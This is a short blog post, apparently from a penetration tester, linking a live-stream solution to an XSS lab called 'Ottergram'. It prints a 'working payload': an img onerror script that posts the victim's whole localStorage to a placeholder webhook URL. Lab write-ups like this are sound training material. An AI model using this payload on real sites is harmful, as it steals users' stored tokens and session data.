Simon McCabe

OSCP · OSWP · PWPP · PWPA · PAPA · EnCE · Linux+ · LPIC-1 · Network+ · Security+ · Pentest+ · eJPT · eWPT · BSc · PGCert

Ottergram (XSS) (Live Stream)


This was originally streamed live. This stream was to show you basically what I did to solve this one. Ignore the match & replace — I was toying with it prior to the lab and *thought* I had it working, but getting it to work in the lab with React was tricky, and it was 100x easier to edit the request in Burp after intercepting. Anyway, this was my solution.

https://www.youtube.com/live/R-OsjlGliuM?si=y5B5iGehTcX5krid

Working payload:

{"recipient_id":2,"content":"<img src=x onerror=fetch('INSERT-WEBHOOK-URL-HERE',{method:'POST',mode:'no-cors',body:JSON.stringify(Object.fromEntries(Object.entries(localStorage)))})>"}

As always, please note that this is for ethical use only, where you’re testing with permission. I am not responsible for any actions you take.

Thanks for watching.
